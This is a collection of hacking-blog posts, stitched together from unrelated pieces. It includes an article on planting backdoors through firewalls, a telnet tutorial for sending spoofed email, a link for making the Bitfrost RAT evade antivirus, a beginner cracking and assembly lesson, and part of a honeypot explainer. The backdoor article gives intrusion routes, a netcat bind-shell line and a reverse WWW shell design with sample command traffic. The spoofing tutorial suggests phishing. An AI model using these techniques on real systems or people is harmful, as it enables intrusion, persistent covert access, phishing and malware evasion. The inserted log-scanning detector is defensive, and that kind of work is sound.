22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

Note:- Some of them might not run in Windows XP Home edition


Placing backdoors thru firewalls

----[ Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does its job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.




----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:

This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:

This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of state information such as TCP sequence numbers. Some pay attention to application protocols, which allows tricks such as only opening ports to the interior network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (That's because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways:

A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:

This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a piece of software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp may only download data but not upload any, that the data has got no virus, that no buffer overflows are generated in answers, etc. One can argue that squid is an application gateway, because it does many sanity checks and lets you filter stuff, but it was not programmed for installation in a secure environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firewalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-buy-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.


----[ Getting in

Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done.

The four main possibilities:

Insider:

There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:

Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:

People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, or replace a gif picture on a web server with one which crashes netscape and executes a command (I never checked if this actually works; it crashes, yeah, but I didn't look through this to see if it is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particularly true for the US, where academic environments and industry/military work close together.

Hijacking Connections:

Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

Trojans:

Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used, or replacing originals on an external server which internal employees access to update their software regularly (ftp xfer files and www logs can be checked to get to know which files these are).




----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regularly. It's the internal machines which are usually unprotected and without much administration and security checks.

I will now talk about some ideas for backdoors which could be implemented. Note that programs which will/would run on a stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.

Packet Filters:

It's hard to find a backdoor which gets through this one but does not work for any other. The few that come to mind are:
a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would need to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://www.thc.org look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:

Here a hacker must use programs which initiate the connection from the secure network to his external 0wned server. There are many out there which could be used:
active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legitimate program on a computer and it encrypts the datastream).
passive:
netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.

Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all that stuff for the stateful filter and "socksify" it. (www.socks.nec.com) For more advanced tools you should take a look at the application gateway section.

Application Gateways:
Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.
active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/checked/audited and accessible from the internet. I hope nobody needs an example of such a thing.
(re-)placing a service/binary on the firewall. This is dangerous because those are audited regularly and sometimes even permanently sniffed ...
Loading a loadable module into the firewall kernel which hides itself and gives access to its master. The best solution for an active backdoor but still dangerous.
passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in reality the answers to commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and replies. The disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example still needs much coding to be effective)




----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:

+--------+                      +------------+                +-------------+
|internal|----------------------|  FIREWALL  |----------------|server owned |
|  host  |   internal network   +------------+    internet    |by the hacker|
+--------+                                                    +-------------+
  SLAVE                                                           MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user using his netscape client to surf the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate-looking http request and sends its ready signal. The legitimate-looking answers of the www server owned by the hacker are in reality the commands the child will execute on its machine in the local shell. All traffic is converted (I'll not call this "encrypted", I'm not Micro$oft) into a Base64-like structure and given as the value of a cgi-string to prevent caching.

Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0

Master replies with
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks:

The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix it the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver, because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; the program masks its name in the process listing ...

Best of all: master & slave program are just one 260-line perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time for the slave to try to connect.

Well, why code it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl installed, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://www.thc.org for updates.


----[ The Source

Grab it here ...

rwwwshell v2.0


----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. Email should be put on a centralized mail server, DNS resolving only done on the WWW/FTP proxies, and access to the WWW only allowed after proxy authentication. However, this is not enough. An attacker can tamper with the mailreader to execute the commands extracted from the crypted X-Headers, or implement the http authentication in the reverse www-shell (it's simple). Also, checking the DNS and WWW logs/caches regularly with good tools can be defeated by switching the external servers every 3-20 calls or using aliases.

A secure solution would be to set up a second network which is connected to the internet, and keep the real one separated - but tell that to the employees ... A good firewall is a big improvement, and an Intrusion Detection System can also help. But nothing can stop a dedicated attacker.
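As an added defensive example (not part of this article or of rwwwshell), the following Python scans web-proxy log lines for the traffic pattern described above: an internal host that every day, at about the same time, issues a GET whose cgi-string value is one long Base64-like blob. It groups by the internal client rather than the external host, so switching the external server every few calls, as the article suggests an attacker would, does not hide the beaconing. The log format, addresses and most tokens are constructed for the example.

```python
# Added defensive example (not from the article): flag the Reverse WWW Shell
# pattern in web-proxy logs. Log format and addresses are constructed.
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")  # "<timestamp> <client> <method> <url>"
B64_RE = re.compile(r"^[A-Za-z0-9+/=_-]{24,}$")   # one long Base64-like token


def parse_log(lines):
    """(timestamp, client, host, path, query) per well-formed line; junk lines are skipped."""
    records = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            ts, client, _method, url = m.groups()
            u = urlsplit(url)
            records.append((datetime.fromisoformat(ts), client, u.hostname, u.path, u.query))
    return records


def looks_encoded(query):
    """True for a cgi-string that is one opaque blob (no key=value) mixing upper case,
    lower case and digits: the shape of the shell's encoded prompt, not a normal query."""
    if not B64_RE.match(query) or "=" in query.rstrip("="):
        return False
    return all(re.search(p, query) for p in (r"[a-z]", r"[A-Z]", r"[0-9]"))


def find_beacons(records, min_days=3, window_minutes=10):
    """Clients whose encoded-looking GETs recur on >= min_days distinct days inside one
    window_minutes-wide time-of-day window. Keyed by client, not destination, so
    rotating the external server every few calls does not defeat the check."""
    per_client = defaultdict(list)
    for ts, client, host, _path, query in records:
        if looks_encoded(query):
            per_client[client].append((ts, host))
    hits = {}
    for client, events in per_client.items():
        for ts0, _ in events:
            centre = ts0.hour * 60 + ts0.minute
            near = [(ts, h) for ts, h in events
                    if abs(ts.hour * 60 + ts.minute - centre) <= window_minutes // 2]
            days = {ts.date() for ts, _ in near}
            if len(days) >= min_days:
                hits[client] = {"days": len(days), "minute_of_day": centre,
                                "hosts": sorted({h for _, h in near})}
                break
    return hits


# Constructed sample: 10.0.0.7 beacons daily around 09:00 and rotates its server,
# 10.0.0.12 browses normally, 10.0.0.9 sends one opaque token once (not enough).
SAMPLE_LOG = """\
2008-01-14T09:00:02 10.0.0.7 GET http://203.0.113.5/cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj
2008-01-14T09:00:03 10.0.0.7 GET http://203.0.113.5/cgi-bin/order?g5mAlfbknzQ2kd9KzPq4Lm8sTrWx1YvBcN3e
2008-01-14T10:15:40 10.0.0.12 GET http://example.com/index.html
2008-01-14T10:16:01 10.0.0.12 GET http://example.com/search?q=firewall+toolkit
2008-01-15T09:01:11 10.0.0.7 GET http://203.0.113.5/cgi-bin/order?p8TzQkL2mNvX4yRdWc9sHbJ1eFgA6uKo
2008-01-15T14:20:00 10.0.0.9 GET http://example.net/app?Zk3mQ9xLpR7sTvB2nYcW4dHjF8gK1eMa
2008-01-16T08:58:45 10.0.0.7 GET http://198.51.100.23/cgi-bin/order?Q1wXe4rTy7uIo0pAs2dFg5hJk8lZx3cV
this line is garbage and must be skipped
"""


def scan(text=SAMPLE_LOG):
    return find_beacons(parse_log(text.splitlines()))


if __name__ == "__main__":
    for client, info in scan().items():
        print(f"{client}: encoded GETs on {info['days']} days around minute "
              f"{info['minute_of_day']} of the day, to {info['hosts']}")
```

The same logic applied to real proxy logs needs only a different LOG_RE; the time window and day threshold are the knobs that trade false positives against how long an attacker can go unnoticed.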


Video tutorials on hacking  

These video tutorials give you brief information about
Scanning
checking for live systems
banner grabbing
scenario

tools
angry ip
nmap
netscan tool pro
banner grabbing method
netcraft OS detection tools
sockschain

enumeration
what is enumeration
snmp enumeration

example: connect using a null session
tools-dumpsec
system identification number
get acct tool
solar winds

tools-userinfo
tool-userip

buffer overflow
reasons for attack
nops
defence against buffer over flow attack
buffer overflow
cryptography
piks
rsa attack and algorithms
code breaking methodologies
penetration testing
vulnerability assessment
terms of engagement
filtering devices
impact of threat
phases of penetration testing

http://rapidshare.com/files/50056939/Buffer_Overflow.part2.rar
http://rapidshare.com/files/50467225/Buffer_Overflow.part1.rar
http://rapidshare.com/files/51507987/Scanning.part2.rar
http://rapidshare.com/files/52580269/Scanning.part1.rar


Send Fake mails via Telnet  

What is Telnet ?

You do not need to worry about it right now; if you want to know, read another of my tutorials. For now just remember that telnet is a protocol for connecting two computers on the internet.

Why do we want to send anyone fake email ?
Well most commonly to play pranks on friends
you can use them for phishing attacks or social engineering
whatever your purpose may be, remember that unless you find a totally anonymous server your ip is logged, so if the person complains you can be caught

that is why i recommend you to use shell accounts or proxies

Enough of this shit, i wanna type something !!!

So here we go
In this tutorial i am gonna use yahoo's smtp server
Step 1: launch command prompt or bash shell

Step 2: Connect to yahoo's smtp server
type telnet mx1.mail.yahoo.com 25
you'll get a response as in the image



Step 3: Type helo



Step 4: Type mail from:



Step 5: Type rcpt to:



Step 6: type data




Step 7: enter the data as follows

subject : whatever you want
from : whatever you want
to: whatever you want
date: none

your emails body

.




Do not forget to press enter after every line; also, to end your msg type " . " (dot) and press enter

Step 8: type quit to close your connection



If you want to send email to person with a hotmail or gmail or anyother account then you'll have to telnet to smtp server of that email site

thats all regarding sending fake email
Suggestions and Feedbacks are appreciated
Bye :-

Avada Kedavra


Make Bitfrost RAT undetectable  

This tutorial will help u make Bitfrost RAT undetectable by AV

http://rapidshare.com/files/9060332/Bitfrost-Ud.pdf.html


Basic Cracking  

=============
[BEGIN LESSON]
=============
To begin learning reverse engineering you MUST know some ASM,
aka the computer's machine code.

OK, let's learn this stuff then.

Here's some ASM just to let you know what it looks like.

Code:

00xx:00xxxx Call 00403214
00xx:00xxxx Test Eax,Eax
00xx:00xxxx Jne 00043242
00xx:00xxxx Ret
00xx:00xxxx Cmp Ebx,Esi


so what does that mean?

I'm just going to start off by explaining each important ASM instruction
and how the CPU works.

Inside the CPU is a set of registers; these are like pre-defined variables, and here are some of the ones you will most likely see.

Code:
AX/EAX - Accumulator Register - used for storing numbers and the output of sums
BX/EBX - Base Register - usually for storing numbers for calculations
CX/ECX - Counter Register - used in loops, incremented or decremented
IP/EIP - Instruction Pointer - stores the address (line number) of the next command


Now that's a very brief description of the registers.


=========
COMMANDS
=========

{********************** MOV ******************************}
Code:
MOV dest,sour - This is the most common instruction it simply moves data from one register to another.

e.g
Code:

MOV AX,56 - (Move 56 into AX)
MOV BX,AX - (Move AX into BX, so BX contains 56 because we had 56 in AX)



{********************** ADD ******************************}
Code:
ADD op1,op2 - Adds two registers together and puts the result in op1.


e.g
Code:

MOV BX,23
MOV AX,10
ADD BX,AX


Adds 10 to 23
so the answer 33 is left in BX


{********************** SUB ******************************}
Code:
SUB op1,op2 - Subtract op2 from op1 and put the result in op1.


Code:
MOV BX,23
MOV AX,10
ADD BX,AX
MOV CX,10
SUB BX,CX


See if you can follow that.

So BX=33 at the moment; then we take CX (which is 10) away from it, which leaves the result in BX, so BX would now equal 23.




{*********** Important ASM commands for Cracking *************}

OK, we must learn this stuff first.
Code:

CALL 200

- This calls another set of instructions at 200, then returns to the line after the one it was called from

e.g

Code:
100: MOV AX,10
102: MOV BX,20
104: CALL 200  ---------->-----------------------+
106: MOV DX,20 <-+                               |
108: MOV CX,DX   |                               v
                 |               200: SUB AX,CX
                 |               202: MOV CX,02
                 +--------<----  204: RET
                                 206: blah
                                 208: blah


Don't bother trying to follow the code, as I just made it up; just take note of the cycle: when it meets the CALL command it jumps to the line number provided (200 in this case) and executes the code there until it sees the RET command, then goes back to the next line in the main program (RET = Return).



======
JUMPS
======

In asm there are lots of different conditions for the jump command; they mostly depend on "flags". Flags are boolean variables in the CPU, for those
of you that don't know what a boolean is.

It is a variable which has two states, 'on or off', in this case '0 or 1'.

Most programs have a serial check routine that is stored in a call. After this call AX is set to 0 or 1; this then has a logical AND performed on it, aka TEST AX,AX, which sets the ZERO flag on or off, so it's either Z or NZ (zero or not zero). Then a jump conditional on the zero flag is done. That's probably not explained very well, but I'll explain it better later when we get to cracking; for now here are some of our important jump commands.

Code:
JMP xxxx - Jumps to xxxx no matter what
JNZ xxxx - Jump if the Zero flag is not set
JZ xxxx - Jump if the Zero flag is set
JNE xxxx - Jump if not equal (same instruction as JNZ)
JE xxxx - Jump if equal (same instruction as JZ)
JG xxxx - Jump if greater (signed comparison)
JL xxxx - Jump if less than (signed comparison)
JA xxxx - Jump if above (unsigned comparison)
JB xxxx - Jump if below (unsigned comparison)
JGE xxxx - Jump if greater than or equal to (signed)
JBE xxxx - Jump if below or equal to (unsigned)


So many, but that's not all; just try and remember those, it's quite logical really. The signed/unsigned split matters: after CMP AX,BX the CPU sets the same flags either way, but JG/JL read them as signed values and JA/JB as unsigned, so the two families can disagree on the same registers.


======
Stack
======

k nearly done Smiley

The stack is an area of memory used to hold values from registers for later use. Placing a register's contents onto the stack is called "pushing"; taking a value off the stack and back into a register is called "popping".


The stack works on LIFO - Last In first Out.
e.g

Code:
MOV AX,1
MOV BX,2
PUSH AX
PUSH BX
POP AX
POP BX



So what are the values of AX and BX now? Let's go through it.

Code:
AX=1
BX=2


PUSH AX - look at stack table 1

Code:
1)Stack
1


PUSH BX - look at stack table 2

Code:
2)stack
2
1


POP AX - takes the top value off the stack and puts it into AX,
which is 2

POP BX - puts 1 into BX, because 2 has already been taken off the stack
so now 1 is on top


So from that you can see that the stack puts everything on top, and takes it back off the top, which is why the two registers end up swapped.


{************ Last Word On ASM ***************}

Just 1 more thing to cover.

This is brackets: when you see brackets around something, it is referring to the contents of memory at that address rather than the number itself.

Code:
MOV AX,2
MOV [300],AX - This moves the value in AX into memory at address 300


or

Code:
MOV [0032543],500
CALL [0032543] - This reads the value stored at address 0032543 (which is 500) and calls the procedure at 500


You should get that by now, I hope Wink

{**********************************************************************************}
OK, that was ASM; you should now have a rough idea of how it works.
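The whole lesson boils down to a handful of instructions, so here is a toy interpreter for exactly that subset, added here as an example rather than taken from the lesson. It runs the ADD/SUB, stack and [bracket] listings from the text, plus two more: the serial-check shape the jump section describes (a CALL that leaves 0 or 1 in AX, TEST AX,AX, one conditional jump) and a CMP that makes JA and JG disagree on the same registers. Addresses are the listing's own line numbers rather than real byte offsets, and immediates are decimal as in the lesson; both are assumptions made to keep the model small.

```python
# Added example (not from the lesson): a toy interpreter for the 16-bit x86
# subset used above - AX..DX, the flags, a LIFO stack, CALL/RET and [address]
# memory operands. Addresses are the listing's line numbers (an assumption that
# keeps the model small); nothing here is real machine encoding.
import re

MASK, SIGN = 0xFFFF, 0x8000

# What each conditional jump tests. JG/JL/JGE are signed comparisons (sign and
# overflow flags); JA/JB/JBE are unsigned (carry flag); JZ/JE and JNZ/JNE are
# the same instruction under two names.
JUMPS = {
    "JZ": lambda c: c.zf, "JE": lambda c: c.zf,
    "JNZ": lambda c: not c.zf, "JNE": lambda c: not c.zf,
    "JA": lambda c: not (c.cf or c.zf), "JB": lambda c: c.cf, "JBE": lambda c: c.cf or c.zf,
    "JG": lambda c: not c.zf and c.sf == c.of, "JL": lambda c: c.sf != c.of,
    "JGE": lambda c: c.sf == c.of,
}


class MiniCPU:
    def __init__(self, listing):
        # "104: CALL 200" lines, separated by newlines or semicolons
        self.code = {int(a): t.strip() for a, t in
                     (l.split(":", 1) for l in re.split(r"[;\n]", listing) if l.strip())}
        self.order = sorted(self.code)
        self.regs = {"AX": 0, "BX": 0, "CX": 0, "DX": 0}
        self.mem, self.stack = {}, []            # [address] cells; PUSH appends, POP pops
        self.zf = self.cf = self.sf = self.of = False
        self.ip = self.order[0]

    def read(self, op):
        if op in self.regs:
            return self.regs[op]
        if op[0] == "[":                         # [300] = the value stored at address 300
            return self.mem.get(int(op[1:-1]), 0)
        return int(op) & MASK                    # decimal immediate, as in the lesson

    def write(self, op, val):
        if op in self.regs:
            self.regs[op] = val & MASK
        else:
            self.mem[int(op[1:-1])] = val & MASK

    def arith(self, a, b, sub):
        # ADD/SUB/CMP core: the 16-bit result plus the flags the jumps look at
        full = a - b if sub else a + b
        res = full & MASK
        self.zf, self.sf = res == 0, bool(res & SIGN)
        self.cf = full < 0 or full > MASK        # borrow on SUB, carry out on ADD
        self.of = bool(((a ^ b) & (a ^ res) if sub else (a ^ res) & (b ^ res)) & SIGN)
        return res

    def step(self):
        op, *args = self.code[self.ip].replace(",", " ").upper().split()
        i = self.order.index(self.ip)
        nxt = self.order[i + 1] if i + 1 < len(self.order) else None
        if op == "MOV":
            self.write(args[0], self.read(args[1]))
        elif op in ("ADD", "SUB"):
            self.write(args[0], self.arith(self.read(args[0]), self.read(args[1]), op == "SUB"))
        elif op == "CMP":                        # SUB whose result is discarded
            self.arith(self.read(args[0]), self.read(args[1]), True)
        elif op == "TEST":                       # AND whose result is discarded; ZF set iff it is 0
            res = self.read(args[0]) & self.read(args[1])
            self.zf, self.sf, self.cf, self.of = res == 0, bool(res & SIGN), False, False
        elif op == "PUSH":
            self.stack.append(self.read(args[0]))
        elif op == "POP":
            self.write(args[0], self.stack.pop())   # last in, first out
        elif op == "CALL":
            self.stack.append(nxt)               # return address; RET pops it back
            nxt = self.read(args[0])
        elif op == "RET":
            nxt = self.stack.pop()
        elif op == "JMP" or (op in JUMPS and JUMPS[op](self)):
            nxt = self.read(args[0])
        elif op == "HLT":
            nxt = None
        elif op not in JUMPS:
            raise ValueError(f"unsupported instruction at {self.ip}: {op}")
        self.ip = nxt

    def run(self, max_steps=10000):
        while self.ip is not None and max_steps:
            self.step()
            max_steps -= 1
        return self


def run(listing, **init):
    """Run a listing with optional starting registers, e.g. run(SERIAL_CHECK, AX=1234)."""
    cpu = MiniCPU(listing)
    cpu.regs.update({k.upper(): v & MASK for k, v in init.items()})
    return cpu.run()


# The lesson's own examples, plus the serial-check shape the jump section
# describes (CALL leaves 0/1 in AX, TEST AX,AX sets ZF, one JZ picks the path)
# and a CMP that shows why JA and JG are not interchangeable.
ADD_SUB = "100: MOV BX,23; 102: MOV AX,10; 104: ADD BX,AX; 106: MOV CX,10; 108: SUB BX,CX"
STACK_LIFO = "100: MOV AX,1; 102: MOV BX,2; 104: PUSH AX; 106: PUSH BX; 108: POP AX; 110: POP BX"
INDIRECT = ("100: MOV AX,2; 102: MOV [300],AX; 104: MOV [32543],200; 106: CALL [32543]; 108: HLT;"
            "200: ADD AX,[300]; 202: RET")
SERIAL_CHECK = ("100: CALL 200; 102: TEST AX,AX; 104: JZ 110; 106: MOV BX,1; 108: HLT; 110: MOV BX,0; 112: HLT;"
                "200: CMP AX,1234; 202: JNE 208; 204: MOV AX,1; 206: RET; 208: MOV AX,0; 210: RET")
SIGNED_VS_UNSIGNED = ("100: MOV AX,65535; 102: CMP AX,1; 104: JA 108; 106: HLT; 108: MOV BX,1;"
                      "110: CMP AX,1; 112: JG 116; 114: HLT; 116: MOV CX,1")

if __name__ == "__main__":
    print(run(ADD_SUB).regs["BX"], run(STACK_LIFO).regs)
    print(run(SERIAL_CHECK, AX=1234).regs["BX"], run(SERIAL_CHECK, AX=4321).regs["BX"])
```

Run it and change the `JZ 110` at address 104 to `JNZ`, or the 1234 to your own value, and watch which path BX records; that one conditional jump is the decision point the jump section is pointing at. The last listing is the caveat the jump table glosses over: the same CMP sets the same flags, but the unsigned jumps read the carry flag while the signed ones read sign and overflow, so 65535 is "above" 1 and, read as -1, at the same time not "greater than" 1.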


==========
[END LESSON]
==========


Leave comments if you benefited from the lesson.


And if you want to know more about cracking, like how it is done, what the procedure is, and some examples, download this .txt file:
http://www.4shared.com/file/25161321/fa300782/Howtocrk.html
It will help you more.



What are honey pots  

Honeypots are an exciting new technology with enormous potential for the security community. The concepts were first introduced by several icons in computer security, specifically Cliff Stoll in the book "The Cuckoo's Egg" and Bill Cheswick in the paper "An Evening with Berferd." Since then, honeypots have continued to evolve, developing into the powerful security tools they are today. The purpose of this paper is to explain exactly what honeypots are, their advantages and disadvantages, and their value to the security community.

Definitions
The first step to understanding honeypots is defining what a honeypot is. This can be harder than it sounds. Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. It is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand. As such, I use the following definition of a honeypot.

A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.


This is a general definition covering all the different manifestations of honeypots. We will be discussing in this paper different examples of honeypots and their value to security. All will fall under the definition above: their value lies in the bad guys interacting with them. Conceptually, almost all honeypots work the same way. They are a resource that has no authorized activity; they do not have any production value. Theoretically, a honeypot should see no traffic because it has no legitimate activity. This means any interaction with a honeypot is most likely unauthorized or malicious activity. Any connection attempt to a honeypot is most likely a probe, attack, or compromise. While this concept sounds very simple (and it is), it is this very simplicity that gives honeypots their tremendous advantages (and disadvantages). I highlight these below.

Advantages: Honeypots are a tremendously simple concept, which gives them some very powerful strengths.


* Small data sets of high value: Honeypots collect small amounts of information. Instead of logging one GB of data a day, they can log only one MB of data a day. Instead of generating 10,000 alerts a day, they can generate only 10 alerts a day. Remember, honeypots only capture bad activity; any interaction with a honeypot is most likely unauthorized or malicious. As such, honeypots reduce 'noise' by collecting only small data sets, but information of high value, as it comes only from the bad guys. This means it is much easier (and cheaper) to analyze the data a honeypot collects and derive value from it.

* New tools and tactics: Honeypots are designed to capture anything thrown at them, including tools or tactics never seen before.

* Minimal resources: Honeypots require minimal resources, they only capture bad activity. This means an old Pentium computer with 128MB of RAM can easily handle an entire class B network sitting off an OC-12 network.

* Encryption or IPv6: Unlike most security technologies (such as IDS systems) honeypots work fine in encrypted or IPv6 environments. It does not matter what the bad guys throw at a honeypot, the honeypot will detect and capture it.

* Information: Honeypots can collect in-depth information that few, if any other technologies can match.

* Simplicity: Finally, honeypots are conceptually very simple. There are no fancy algorithms to develop, state tables to maintain, or signatures to update. The simpler a technology, the less likely there will be mistakes or misconfigurations.



Disadvantages: Like any technology, honeypots also have their weaknesses. It is because of this they do not replace any current technology, but work with existing technologies.

# Limited view: Honeypots can only track and capture activity that directly interacts with them. Honeypots will not capture attacks against other systems, unless the attacker or threat interacts with the honeypots also.

# Risk: All security technologies have risk. Firewalls have the risk of being penetrated, encryption has the risk of being broken, IDS sensors have the risk of failing to detect attacks. Honeypots are no different; they have risk also. Specifically, honeypots have the risk of being taken over by the bad guy and used to harm other systems. This risk varies between honeypots. Depending on the type, a honeypot can have no more risk than an IDS sensor, while some honeypots have a great deal of risk. We identify which honeypots have what levels of risk later in the paper.


It is how you leverage these advantages and disadvantages that defines the value of your honeypot (which we discuss later).

Types of Honeypots
Honeypots come in many shapes and sizes, making them difficult to get a grasp of. To help us better understand honeypots and all the different types, we break them down into two general categories, low-interaction and high-interaction honeypots. These categories help us understand what type of honeypot you are dealing with, its strengths, and its weaknesses. Interaction defines the level of activity a honeypot allows an attacker. Low-interaction honeypots have limited interaction; they normally work by emulating services and operating systems. Attacker activity is limited to the level of emulation by the honeypot. For example, an emulated FTP service listening on port 21 may just emulate an FTP login, or it may support a variety of additional FTP commands. The advantage of a low-interaction honeypot is its simplicity. These honeypots tend to be easier to deploy and maintain, with minimal risk. Usually they involve installing software, selecting the operating systems and services you want to emulate and monitor, and letting the honeypot go from there. This plug-and-play approach makes deploying them very easy for most organizations. Also, the emulated services mitigate risk by containing the attacker's activity; the attacker never has access to an operating system to attack or harm others. The main disadvantages of low-interaction honeypots are that they log only limited information and are designed to capture known activity. The emulated services can only do so much. Also, it is easier for an attacker to detect a low-interaction honeypot; no matter how good the emulation is, a skilled attacker can eventually detect its presence. Examples of low-interaction honeypots include Specter, Honeyd, and KFSensor.

